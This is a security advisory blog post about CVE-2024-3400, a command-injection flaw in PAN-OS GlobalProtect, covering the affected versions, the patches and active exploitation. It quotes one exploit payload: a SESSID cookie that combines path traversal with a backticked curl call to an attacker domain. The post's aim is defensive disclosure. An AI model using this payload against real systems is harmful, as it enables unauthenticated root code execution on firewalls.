Tue, Apr 23, 2024
Note: This vulnerability remains under active exploitation, and Kroll experts are investigating. If further details are uncovered by our team, updates will be made to the Kroll Cyber Risk blog.
A command injection vulnerability, being tracked as CVE-2024-3400, was recently discovered in the GlobalProtect feature of Palo Alto Networks PAN-OS software. This vulnerability has a CVSS score of 10 (Critical) and is actively being exploited in the wild. It impacts versions PAN-OS 120.2, PAN-OS 11.0 and PAN-OS 11.1. If exploited on vulnerable PAN-OS versions and distinct feature configurations, an unauthenticated attacker could execute arbitrary code with root privileges on the firewall.
Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 have been developed and were released on April 14, 2024. Cloud NGFW, Panorama appliances and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.
Kroll is aware of increasing cases of exploitation of this vulnerability in the wild. Palo Alto customers who have not patched their GlobalProtect devices should assume compromise.
On April 16, watchTowr posted a technical breakdown and proof of concept (POC) for the CVE-2024-3400, revealing the trivial nature of exploiting this vulnerability. The issue is caused by allowing arbitrary file writes via a path traversal string and command injection set in the session ID handle, which can be changed by an attacker by editing the Cookie parameter of their request.
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/hour/[arbitrarystring]`curl${IFS}attackerdomain.com`;
Copy
This will create an empty file in the “device_telemetry/hour” directory which is processed hourly, the logging service will action all requests in the directory each hour, and due to a failure to sanitize filenames, will execute the command in the filename, in the example above that is making a request to an attacker domain.
Kroll alerted clients to the threat on Friday, April 12, 2024. Since then, we have responded to suspected compromises surrounding this vulnerability. To address these concerns, our investigators have developed a standardized incident response approach. This includes:
Kroll has observed active, opportunistic exploitation of CVE-2024-3400 by numerous actors. Due to the ease of exploit and perfect positioning to further intrusions into a network this vulnerability serves as a high priority target for threat actors before the flaws are fixed.
Kroll observations show multiple methods of testing and exploring the vulnerability conducted from a highly geographically distributed range of IP addresses, which are being actively investigated and have been added to the Kroll IOC detection database. We do not see evidence of successful exploitation on patched devices.
Palo Alto provides CLI commands in their FAQ to identify indicators of attempted compromise.
Security researchers have identified that the path traversal exploit may be related to an open-source web framework “Gorilla”, which does not sanitize SessionIDs correctly, subsequently a fix was submitted to the repo. Kroll has not yet independently verified if this is the case, however the Gorilla library is certainly vulnerable to path traversal. As of April 18, 2024, a CVE has not been assigned. Gorilla is used by hundreds of other projects on GitHub and likely used as part of many other private codebases. Kroll is continuing to analyze the threat that this vulnerability could pose to other popular projects and products.
Below are some key recommendations from Kroll’s cyber threat intelligence (CTI) team:
Incident response, digital forensics, breach notification, managed detection services, penetration testing, cyber assessments and advisory.
Threat intelligence are fueled by frontline incident response intel and elite analysts to effectively hunt and respond to threats.
Proactively safeguard your organization’s digital assets and accelerate visibility of online threats.
Kroll is the largest global IR provider with experienced responders who can handle the entire security incident lifecycle.
Stop cyberattacks. Kroll Responder managed detection and response is fueled by seasoned IR experts and frontline threat intelligence to deliver unrivaled response.